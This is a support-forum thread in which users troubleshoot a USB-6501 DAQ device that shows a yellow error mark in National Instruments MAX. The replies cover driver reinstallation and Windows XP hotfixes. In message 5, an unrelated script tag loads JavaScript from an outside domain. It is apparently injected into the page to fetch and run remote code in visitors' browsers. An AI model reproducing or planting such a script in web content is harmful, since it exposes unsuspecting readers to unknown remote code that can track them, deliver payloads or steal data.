Digital I/O

cancel
Showing results for 
Search instead for 
Did you mean: 

How to fix the USB-6501 has a yellow error mark in MAX

Hello,

The USB-6501 was good in MAX. My program can also access USB-6501 very well. Today I fund Dev1 (USB-6501) had a yellow mark in MAX, But It still can pass self test, Test Panel and Reset device. While My Labview program can not control it. I remove all the National instruments software, even I delete the folder of National instruments. And re-install DAQMX 9.3.5. But it doesn't work. The yellow error mark already there, before I pulg USB-6501. It still can pass all the MAX tests. My program still doesn't work.

How Can I remove the yellow error mark from MAX? Thanks a lot.

Steven

0 Kudos
Message 1 of 6
(5,533 Views)

Try reinstalling the driver for it in Device Manager.

Device properties, Driver tab, "Update Driver..." and search automatically.

If that doesn't work, try "Uninstall"ing the device and physically disconnect/reconnect it.  This will force enumeration and driver installation.

0 Kudos
Message 2 of 6
(5,529 Views)

StevenZheng,

Have you managed to resolve the problem. I'm having the same issue.

0 Kudos
Message 3 of 6
(5,506 Views)

The yellow error mark is only present in MAX? Is there corresponding information in the right-hand view of MAX when you select the device?

One situation that will cause that is if you're using a USB DAQ device on Windows XP, and you don't have a particular Windows hotfix applied. There's a error-mark tab when you select the device that will refer you to a KnowledgeBase article: Why am I Getting Bad Data on My USB DAQ Device on Windows XP?

However, that particular situation should not prevent you from using your device in LabVIEW. What error are you getting from your LabVIEW program?

——
Brandon Streiff
ni.com/compactdaq · ni.com/daq
0 Kudos
Message 4 of 6
(5,450 Views)

The yellow error mark is only present in MAX.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
0 Kudos
Message 5 of 6
(5,285 Views)

Hello,

This may be an issue with Microsoft XP. I have included a link below with more information. I hope this helps!

Why Are There Yellow Bangs By Each USB Device in Measurement & Automation Explorer in Windows XP?

Regards,

Jason D

Applications Engineer

National Instruments

www.ni.com/support

0 Kudos
Message 6 of 6
(5,251 Views)